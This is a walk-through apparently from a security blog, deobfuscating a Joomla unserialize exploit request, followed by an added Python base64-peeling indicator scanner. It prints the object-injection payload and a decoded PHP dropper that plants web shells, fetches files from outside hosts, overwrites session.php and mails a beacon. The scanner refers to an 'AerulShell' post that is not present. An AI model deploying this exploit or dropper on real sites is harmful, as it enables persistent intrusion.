Joomla DeSerialize Deobfuscation 101

Saw this web request; it is the Joomla unserialize vulnerability. Below is a walk-through of how to see what it's doing.

GET /

}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:3738:\"eval(base64_decode('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'));JFactory::getConfig();exit\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\xfd\xfd\xfd


Joomla wasn't validating this input, and when it deserialized the blob above it would evaluate and execute part of it. What, you may ask? Take the base64-encoded portion, do a quick decode, and you get:

$check = $_SERVER['DOCUMENT_ROOT'] . "/media/xxxx.php" ;
$fp=fopen("$check","w+");
fwrite($fp,base64_decode('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'));
fclose($fp);


Above you see they are opening a new file under your web root called media/xxxx.php and writing something to it. What, you may ask? Let's base64-decode that something as well. Ah, interesting: we get the PHP code below.

<?php
function http_get($url){
  $im = curl_init($url);
  curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
  curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
  curl_setopt($im, CURLOPT_HEADER, 0);
  return curl_exec($im);
  curl_close($im);
}
$check = $_SERVER['DOCUMENT_ROOT'] . "/media/css.php" ;
$text = http_get('http://mrtg.ui.phinma.edu.ph/components/joomla.txt');
$open = fopen($check, 'w');
fwrite($open, $text);
fclose($open);
if(file_exists($check)){
  echo $check."
";
}else
  echo "not exits";
echo "done .\n " ;
$check2 = $_SERVER['DOCUMENT_ROOT'] . "/media/jmail.php" ;
$text2 = http_get('http://mrtg.ui.phinma.edu.ph/components/jmailz.txt');
$open2 = fopen($check2, 'w');
fwrite($open2, $text2);
fclose($open2);
if(file_exists($check2)){
  echo $check2."
";
}else
  echo "not exits2";
echo "done2 .\n " ;

$check3=$_SERVER['DOCUMENT_ROOT'] . "/H.htm" ;
$text3 = http_get('');
$op3=fopen($check3, 'w');
fwrite($op3,$text3);
fclose($op3);

$check4=$_SERVER['DOCUMENT_ROOT'] . "/media/check.php" ;
$text4 = http_get('http://mrtg.ui.phinma.edu.ph/components/qq.txt');
$op4=fopen($check4, 'w');
fwrite($op4,$text4);
fclose($op4);

$check5=$_SERVER['DOCUMENT_ROOT'] . "//media/jmails.php" ;
$text5 = http_get('http://mrtg.ui.phinma.edu.ph/components/qqz.txt');
$op5=fopen($check5, 'w');
fwrite($op5,$text5);
fclose($op5);

$check6=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/session/session.php" ;
$text6 = http_get('http://pastebin.com/raw/UHAGT887');
$op6=fopen($check6, 'w');
fwrite($op6,$text6);
fclose($op6);

$toz = "";
$subject = 'Jom zzz ' . $_SERVER['SERVER_NAME'];
$header = 'from: Kekkai Sensen ' . "\r\n";
$message = "Shellz : http://" . $_SERVER['SERVER_NAME'] . "/libraries/joomla/jmail.php?u" . "\r\n" . php_uname() . "\r\n";
$sentmail = @mail($toz, $subject, $message, $header);

@unlink(__FILE__);

?>


Now the attacker can access the file on your site at www.mysite.com/media/xxxx.php. As soon as he does, the PHP code above creates another file called css.php from the contents of the malicious URL hxxp://mrtg.ui.phinma.edu.ph/components/joomla.txt. It actually does this over and over, creating a bunch of backdoors or web shells, so that even if the good guy finds and removes one or two of these files, the attacker still has a way back onto your compromised machine. Finally, at the end, an email is sent to indicate the code ran successfully.
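Both this walk-through and the AerulShell one above come down to the same analyst step: peel nested base64 out of `eval(base64_decode(...))` and read what each layer does. As an added example (not code from either post), the Python below automates that peeling and flags the behaviours the two posts describe (password gate, decoded payload written to disk, remote fetch, mail beacon, self-delete). All the PHP text it runs on is constructed; the dropper URL and mailbox are hypothetical placeholders, and only the md5 hash is taken from the AerulShell post.

```python
import base64
import re

# A quoted literal long enough to be a base64 blob rather than a short string.
B64_LITERAL = re.compile(r"""['"]([A-Za-z0-9+/]{32,}={0,2})['"]""")
URL = re.compile(r"https?://[^\s'\"<>()]+")
# Behaviour indicators lifted from the two walk-throughs.
INDICATORS = {
    "eval_of_decoded_data": re.compile(r"eval\s*\(\s*(?:base64_decode|gzinflate|str_rot13)\s*\("),
    "md5_password_gate": re.compile(r"md5\s*\(\s*\$_(?:POST|GET|REQUEST)\[[^\]]*\]\s*\)\s*=="),
    "decoded_payload_to_disk": re.compile(r"fwrite\s*\(\s*\$\w+\s*,\s*base64_decode\s*\("),
    "arbitrary_file_read": re.compile(r"file_get_contents\s*\(\s*\$_(?:GET|POST|REQUEST)"),
    "remote_fetch": re.compile(r"curl_init\s*\(|file_get_contents\s*\(\s*['\"]https?://"),
    "command_execution": re.compile(r"\b(?:exe|exec|shell_exec|system|passthru|popen)\s*\(\s*\$_(?:GET|POST|REQUEST)"),
    "mail_beacon": re.compile(r"\bmail\s*\("),
    "socket_connect": re.compile(r"\bfsockopen\s*\("),
    "self_delete": re.compile(r"\bunlink\s*\(\s*__FILE__\s*\)"),
}


def _looks_like_text(raw: bytes) -> bool:
    """Accept a decoded blob only if it is (almost) all printable ASCII."""
    if not raw:
        return False
    ok = sum(32 <= b < 127 or b in (9, 10, 13) for b in raw)
    return ok / len(raw) >= 0.95


def peel(text: str, max_depth: int = 5) -> list[str]:
    """Return the text plus every nested layer that base64-decodes to text."""
    layers, frontier = [text], [text]
    for _ in range(max_depth):
        found = []
        for chunk in frontier:
            for m in B64_LITERAL.finditer(chunk):
                try:
                    raw = base64.b64decode(m.group(1), validate=True)
                except ValueError:  # not valid base64 (e.g. a hex hash) -> skip
                    continue
                if _looks_like_text(raw):
                    found.append(raw.decode("ascii", errors="replace"))
        if not found:
            break
        layers.extend(found)
        frontier = found
    return layers


def analyze(php_text: str) -> dict:
    """Summarise layer count, behaviour indicators and URLs across all layers."""
    layers = peel(php_text)
    hits, urls = set(), set()
    for layer in layers:
        hits.update(name for name, rx in INDICATORS.items() if rx.search(layer))
        urls.update(URL.findall(layer))
    return {"layers": len(layers), "indicators": sorted(hits), "urls": sorted(urls)}


def _b64(s: str) -> str:
    return base64.b64encode(s.encode()).decode()


# Constructed stand-in for the Joomla dropper: three layers shaped like the post's.
LAYER2 = (
    "<?php\n"
    "function http_get($url){ $im = curl_init($url); curl_setopt($im, CURLOPT_RETURNTRANSFER, 1); return curl_exec($im); }\n"
    "$text = http_get('http://dropper.example.invalid/joomla.txt');\n"
    "$open = fopen($_SERVER['DOCUMENT_ROOT'] . '/media/css.php', 'w'); fwrite($open, $text); fclose($open);\n"
    "@mail('', 'Jom zzz ' . $_SERVER['SERVER_NAME'], 'Shellz', 'from: x');\n"
    "@unlink(__FILE__);\n?>"
)
LAYER1 = (
    "$check = $_SERVER['DOCUMENT_ROOT'] . \"/media/xxxx.php\";\n"
    '$fp=fopen("$check","w+");\n'
    f"fwrite($fp,base64_decode('{_b64(LAYER2)}'));\nfclose($fp);"
)
JOOMLA_PAYLOAD = f"eval(base64_decode('{_b64(LAYER1)}'));JFactory::getConfig();exit"

# Constructed stand-in for the AerulShell fragments (hash is the one in the post).
BEACON = '$visitor = $_SERVER["REMOTE_ADDR"]; @mail("boss@example.invalid", "hit", "Boss, injected target by $visitor");'
AERUL_FRAGMENT = (
    '$auth_pass = "c2b72f86b8ca51642c4a902887830d3e";\n'
    "if( md5($_POST['x']) == $auth_pass ) { $_SESSION[md5($_SERVER['HTTP_HOST'])] = true; }\n"
    f'$shell_data = "{_b64(BEACON)}";\neval(base64_decode($shell_data));\n'
    "if(isset($_GET['dl'])){ $filez = @file_get_contents($_GET['dl']); echo $filez; }\n"
    "$connect = @fsockopen($ip,$o_port,$errno,$errstr,5);\n"
)

if __name__ == "__main__":
    for label, sample in (("joomla", JOOMLA_PAYLOAD), ("aerul", AERUL_FRAGMENT)):
        print(label, analyze(sample))
```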
